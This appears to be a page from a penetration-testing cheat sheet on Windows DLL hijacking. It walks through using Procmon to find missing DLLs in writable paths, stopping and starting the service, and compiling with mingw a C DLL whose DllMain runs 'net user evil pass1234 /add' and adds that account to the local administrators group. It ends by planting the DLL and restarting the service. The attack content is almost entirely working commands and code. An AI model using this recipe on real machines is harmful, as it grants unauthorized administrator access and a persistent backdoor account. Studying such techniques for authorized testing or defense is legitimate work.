DLL/EXE Hijacking

DLL/EXE Hijacking

  • Run Procmon as administrator in rdp session

  • Add filters

    • Result - is - NAME NOT FOUND - Include - click add

    • Path - ends with - .dll - include - click add

    • .apply and okay

  • cmd.exe

    • sc stop dllsvc or servicename

      • or sc.exe stop dllsvc

    • sc start dllsvc

    • OR net stop <servicename>

    • net start <servicename>

  • Now procmon will show more output

  • Check for any .dll file path which is writable

  • Now create same .dll file using windows_dll.c script in kali

    <aside> 👨‍💻 // For x64 compile with: x86_64-w64-mingw32-gcc windows_dll.c -shared -o output.dll // For x86 compile with: i686-w64-mingw32-gcc windows_dll.c -shared -o output.dll

    #include <windows.h>

    BOOL WINAPI DllMain (HANDLE hDll, DWORD dwReason, LPVOID lpReserved) { if (dwReason == DLL_PROCESS_ATTACH) { //or we can add a new user to administrator group system("cmd.exe /k net user evil pass1234 /add"); system("cmd.exe /k net localgroup administrators evil /add"); ExitProcess(0); } return TRUE; }

    </aside>

    • x86_64-w64-mingw32-gcc windows_dll.c -shared -o <vuln-dll>.dll

  • transfer .dll to wrtable location found on Procmon

  • sc stop dllsvc & sc start dllsvc

  • now evil user has been added in administrator group

  • List

PreviousJuicyPotatoNGNextService Binary hijacking

Last updated